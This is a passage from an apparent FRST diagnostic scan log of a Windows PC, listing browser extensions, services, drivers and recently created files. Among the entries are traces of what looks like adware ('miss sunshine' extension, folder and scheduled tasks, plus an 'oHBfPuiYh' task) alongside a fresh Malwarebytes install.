FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-19] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002: @acestream.net/acestreamplugin,version=3.0.3 -> C:\Users\User\AppData\Roaming\ACEStream\player\npace_plugin.dll [2014-12-06] (Innovative Digital Technologies)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-06-10] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @acestream.net/acestreamplugin,version=3.0.3 -> C:\Users\User\AppData\Roaming\ACEStream\player\npace_plugin.dll [2014-12-06] (Innovative Digital Technologies)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-06-10] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\searchplugins\webster.xml [2013-11-03]
FF Extension: AS Magic Player - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\magicplayer@acestream.org [2014-11-01]
FF Extension: LastPass - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\support@lastpass.com [2015-03-06]
FF Extension: YouTube Unblocker - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\youtubeunblocker@unblocker.yt [2014-11-04]
FF Extension: WebSlingPlayer - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{9EB34849-81D3-4841-939D-666D522B889A} [2013-11-07]
FF Extension: Download videos and MP3s from YouTube - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{B64D9B05-48E1-4CEB-BF58-E0643994E900} [2014-08-11]
FF Extension: Extension List Dumper - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\extensionlistdumper@sogame.cat.xpi [2013-11-15]
FF Extension: YouTube Video and Audio Downloader - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\feca4b87-3be4-43da-a1b1-137c24220968@jetpack.xpi [2014-04-14]
FF Extension: YouTube Auto Replay - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\YouTubeAutoReplay@arikv.com.xpi [2014-04-14]
FF Extension: FlashGot - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2014-11-09]
FF Extension: PDFConverterLight - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{41819e5a-4017-4be3-b1be-0868b2283ac1}.xpi [2014-11-30]
FF Extension: {80d2992f-5865-424f-bfbe-3e558ae15978} - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{80d2992f-5865-424f-bfbe-3e558ae15978}.xpi [2014-11-19]
FF Extension: Adblock Plus - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-11-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2014-12-31]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2013-11-05]
FF HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff
FF Extension: Download videos and MP3s from YouTube - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff [2014-08-11]
FF HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff

Chrome:
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-02]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-02]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-02]
CHR Extension: (bmejphbfclcpmpohkggcjeibfilpamia) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmejphbfclcpmpohkggcjeibfilpamia [2015-04-06]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-02]
CHR Extension: (miss sunshine) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\didlppefmhmoiaeemeffjchbieeghlan [2015-04-06]
CHR Extension: (Adobe Acrobat - Create PDF) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2013-11-05]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2014-04-19]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (SlingPlayer Web Plug-in) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lidgnhlbmoakdjkfhanbhfngcadpaiac [2013-11-03]
CHR Extension: (No Name) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhnkgpdlogbknkhlgdjlejeljbhflim [2014-11-01]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-02]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-02]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 ElevateService; C:\Program Files\GIGABYTE\SmartManagerV3\ElevateService.exe [19456 2014-01-06] () [File not signed]
R2 EpsonBidirectionalService; C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSVC.exe [94208 2006-12-19] (SEIKO EPSON CORPORATION) [File not signed]
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [99632 2013-10-01] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1152144 2015-03-27] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-03-22] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-05-31] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-05-31] (Intel Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-03-17] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
R2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [71680 2010-08-05] (Hewlett-Packard) [File not signed]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1878672 2015-03-27] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [22995600 2015-03-27] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1903472 2015-01-16] (Electronic Arts)
R2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [89600 2010-08-05] (Hewlett-Packard) [File not signed]
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2014-12-03] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76888 2014-12-03] ()
R2 RemoteSolverDispatcher; C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\remotesolverdispatcherservice.exe [235656 2013-09-20] (Mentor Graphics Corporation) [File not signed]
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2013-11-10] (SolidWorks) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 Update_Service; C:\Program Files\GIGABYTE\Smart Update\Update_Service.exe [136704 2015-02-11] (GIGABYTE) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 ACPIGBT; C:\Windows\System32\drivers\ACPIGBT.sys [17408 2013-07-03] (Gigabyte United Inc.) [File not signed]
R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [132608 2015-01-29] (Microsoft Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [226304 2013-12-04] (Microsoft Corporation)
R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2013-07-22] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1408824 2013-10-18] (Motorola Solutions, Inc.)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-18] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-18] (Windows ® Win 7 DDK provider)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [142280 2013-10-17] (Intel Corporation)
R1 jnprns; C:\Windows\system32\DRIVERS\jnprns.sys [507192 2014-06-16] (Juniper Networks)
S4 jnprTdi_806_48695; C:\WINDOWS\system32\Drivers\jnprTdi_806_48695.sys [108344 2014-08-07] (Juniper Networks, Inc.)
S3 jnprva; C:\Windows\system32\DRIVERS\jnprva.sys [30072 2014-01-14] (Juniper Networks, Inc.)
R3 JnprVaMgr; C:\Windows\system32\DRIVERS\jnprvamgr.sys [45352 2014-01-14] (Juniper Networks, Inc.)
S3 LGSHidFilt; C:\Windows\system32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R2 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [107736 2015-03-17] (Malwarebytes Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [136408 2015-04-06] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-03-17] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99800 2013-05-31] (Intel Corporation)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3589600 2013-09-25] (Intel Corporation)
S3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew02.sys [3648480 2013-08-30] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-03-27] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [429272 2013-09-11] (Realsil Semiconductor Corporation)
S3 SaiHFF0D; C:\Windows\system32\DRIVERS\SaiHFF0D.sys [171144 2007-05-01] (Saitek)
R3 SaiMini; C:\Windows\System32\drivers\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\system32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
S3 SaiUFF0D; C:\Windows\system32\DRIVERS\SaiUFF0D.sys [34304 2007-05-01] (Saitek)
S3 se64a; C:\Windows\System32\drivers\se64a.sys [14032 2007-05-03] (EnTech Taiwan)
R3 SensorsAlsDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [227840 2014-05-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
S3 WinRing0_1_2_0; C:\Users\User\AppData\Local\Temp\7zS7C1B.tmp\WinRing0x64.sys [14544 2012-10-18] (OpenLibSys.org)
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S3 JNPRNA; \SystemRoot\system32\DRIVERS\jnprna6.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-04-06 22:18 - 2015-04-06 22:18 - 00000000 ____D () C:\FRST
2015-04-06 22:17 - 2015-04-06 22:18 - 00000000 ____D () C:\Users\User\Desktop\Malware software
2015-04-06 21:55 - 2015-04-06 22:09 - 00136408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-04-06 21:55 - 2015-04-06 21:55 - 00001125 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-04-06 21:55 - 2015-04-06 21:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-04-06 21:55 - 2015-04-06 21:55 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-04-06 21:55 - 2015-04-06 21:55 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-04-06 21:55 - 2015-03-17 06:15 - 00107736 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-04-06 21:55 - 2015-03-17 06:15 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-04-06 21:55 - 2015-03-17 06:15 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-04-06 21:38 - 2015-04-06 21:52 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2015-04-06 21:18 - 2015-04-06 21:53 - 00000004 _____ () C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-04-06 20:18 - 2015-04-06 22:18 - 00001348 _____ () C:\WINDOWS\Tasks\miss_sunshine_notification_service.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00001004 _____ () C:\WINDOWS\Tasks\oHBfPuiYh.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00000710 _____ () C:\WINDOWS\Tasks\miss_sunshine_updating_service.job
2015-04-06 20:18 - 2015-04-06 22:08 - 00000000 ____D () C:\Program Files (x86)\miss sunshine
2015-04-06 20:18 - 2015-04-06 20:18 - 00004344 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_notification_service
2015-04-06 20:18 - 2015-04-06 20:18 - 00004008 _____ () C:\WINDOWS\System32\Tasks\oHBfPuiYh
2015-04-06 20:18 - 2015-04-06 20:18 - 00003706 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_updating_service
2015-04-03 21:58 - 2015-04-03 21:58 - 00000000 ___SD () C:\WINDOWS\SysWOW64\GWX
2015-04-03 21:58 - 2015-04-03 21:58 - 00000000 ___SD () C:\WINDOWS\system32\GWX
2015-04-02 00:31 - 2015-04-02 00:32 - 00000000 ____D () C:\Program Files (x86)\Wondershare
2015-04-01 23:00 - 2015-04-03 20:42 - 00000000 ____D () C:\Program Files (x86)\Zviewer
2015-04-01 23:00 - 2015-04-01 23:17 - 00000000 ____D () C:\Users\User\AppData\Roaming\Zviewer
2015-04-01 23:00 - 2015-04-01 23:00 - 00001014 _____ () C:\Users\Public\Desktop\Zviewer.lnk
2015-04-01 23:00 - 2015-04-01 23:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zviewer
2015-03-31 01:14 - 2015-03-31 01:14 - 00004387 _____ () C:\Users\User\AppData\Roaming\oHBfPuiYh
2015-03-30 23:58 - 2015-03-30 23:58 - 00000000 ____D () C:\WINDOWS\SysWOW64\NV
2015-03-30 23:58 - 2015-03-30 23:58 - 00000000 ____D () C:\WINDOWS\system32\NV
2015-03-30 23:48 - 2015-03-30 23:48 - 00000000 ____D () C:\Users\User\AppData\Local\Steam
2015-03-30 23:43 - 2015-03-30 23:43 - 00000000 ____D () C:\Program Files (x86)\AGEIA Technologies
2015-03-30 23:42 - 2015-03-13 08:38 - 00622224 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2015-03-30 23:41 - 2015-03-13 12:41 - 32114888 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 25460880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 24775368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 20466376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 18580512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvwgf2umx.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 17258024 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvd3dumx.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 16022016 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 13297144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 13210080 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 10775080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 10715864 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 10262160 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2015-03-30 23:41 - 2015-03-13 12:41 - 03611792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 03249352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 02906928 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 01896136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6434788.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 01557648 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6434788.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00970384 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00944784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00930448 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00909512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00496272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00400584 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00390288 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00346824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00306208 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00032456 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2015-03-30 23:30 - 2014-11-22 03:46 - 00038032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2015-03-30 23:30 - 2014-11-22 03:46 - 00032400 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2015-03-30 23:20 - 2013-09-11 23:12 - 09889352 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\SysWOW64\RtsPerIcon.dll
2015-03-30 23:18 - 2015-03-30 23:18 - 00001014 _____ () C:\Users\Public\Desktop\Smart Update.lnk
2015-03-30 23:18 - 2015-03-30 23:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart Update
2015-03-21 22:21 - 2015-03-21 22:21 - 00001180 _____ () C:\Users\User\Desktop\Dropbox.lnk
2015-03-21 22:18 - 2015-04-06 22:10 - 00000000 ____D () C:\Users\User\AppData\Roaming\Dropbox
2015-03-21 22:18 - 2015-03-21 22:18 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-03-21 09:44 - 2015-04-06 20:18 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-03-10 23:17 - 2015-02-03 16:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-03-10 23:17 - 2015-02-03 16:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-03-10 23:17 - 2015-02-03 16:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-03-10 23:17 - 2015-02-02 16:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-03-10 23:17 - 2015-02-02 16:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-03-10 23:17 - 2015-01-26 20:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-03-10 23:17 - 2015-01-23 18:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-03-10 23:16 - 2015-02-07 16:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-03-10 23:16 - 2015-02-07 16:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-03-10 23:16 - 2015-02-06 16:09 - 00396419 _____ () C:\WINDOWS\system32\ApnDatabase.xml
2015-03-10 23:16 - 2015-02-05 18:28 - 02257408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-03-10 23:16 - 2015-02-05 18:08 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-03-10 23:16 - 2015-02-05 13:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-03-10 23:16 - 2015-02-02 17:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-03-10 23:16 - 2015-02-02 17:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-03-10 23:16 - 2015-01-30 16:42 - 03097600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-03-10 23:16 - 2015-01-30 16:29 - 02484224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-03-10 23:16 - 2015-01-29 20:01 - 00132608 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthA2DP.sys
2015-03-10 23:16 - 2015-01-29 20:01 - 00097792 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-03-10 23:16 - 2015-01-29 20:00 - 00167424 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rfcomm.sys
2015-03-10 23:16 - 2015-01-29 19:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-03-10 23:16 - 2015-01-29 19:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-03-10 23:16 - 2015-01-29 19:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-03-10 23:16 - 2015-01-29 18:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-03-10 23:16 - 2015-01-29 18:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-03-10 23:16 - 2015-01-29 18:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-03-10 23:16 - 2015-01-29 18:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-03-10 23:16 - 2015-01-29 18:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-03-10 23:16 - 2015-01-29 18:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-03-10 23:16 - 2015-01-29 18:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-03-10 23:16 - 2015-01-29 18:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-03-10 23:16 - 2015-01-29 18:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-03-10 23:16 - 2015-01-29 18:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-03-10 23:16 - 2015-01-28 18:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
